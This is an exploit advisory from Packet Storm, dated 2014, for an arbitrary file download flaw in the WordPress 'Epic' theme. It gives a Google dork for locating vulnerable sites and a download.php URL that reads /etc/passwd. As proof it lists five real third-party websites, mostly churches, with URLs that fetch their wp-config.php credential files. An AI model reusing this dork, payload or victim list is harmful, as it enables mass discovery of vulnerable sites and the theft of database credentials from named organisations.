WordPress Epic Arbitrary File Download

2014-09-08T00:00:00
ID PACKETSTORM:128186
Type packetstorm
Reporter ACC3SS
Modified 2014-09-08T00:00:00

Description

                                        
                                            `|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|  
|-------------------------------------------------------------------------|  
|[*] Exploit Title: Wordpress epic theme Arbitrary File Download Vulnerability  
|  
|[*] Google Dork: inurl:wp-content/themes/epic  
|  
|[*] Date : Date: 2014-09-07  
|  
|[*] Exploit Author: Ashiyane Digital Security Team  
|  
|[*] Vendor Homepage : http://www.organizedthemes.com/epic  
|  
|[*] Tested on: Windows 7  
|  
|-------------------------------------------------------------------------|  
|  
|[*] Location :  
[localhost]/wp-content/themes/epic/includes/download.php?file=/etc/passwd  
|  
|-------------------------------------------------------------------------|  
|[*] Proof:  
|  
|[*]  
http://www.lagunabaptist.org/wp-content/themes/epic/includes/download.php?file=/home/content/46/8992446/html/wp-config.php  
|  
|[*]  
http://doveetown.org/wp-content/themes/epic/includes/download.php?file=/home/content/03/10398303/html/wp-config.php  
|  
|[*]  
http://verdebaptist.com/wp/wp-content/themes/epic/includes/download.php?file=/home/content/44/2981244/html/wp/wp-config.php  
|  
|[*]  
http://kespres.ca/wp-content/themes/epic/includes/download.php?file=/home/content/30/10806230/html/wp-config.php  
|  
|[*]  
http://kimberlywilliamsministries.org/wp-content/themes/epic/includes/download.php?file=/home2/praise11/public_html/wp-config.php  
|  
|-------------------------------------------------------------------------|  
|[*] Discovered By : ACC3SS  
|-------------------------------------------------------------------------|  
|-------------------------------------------------------------------------|  
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|  
`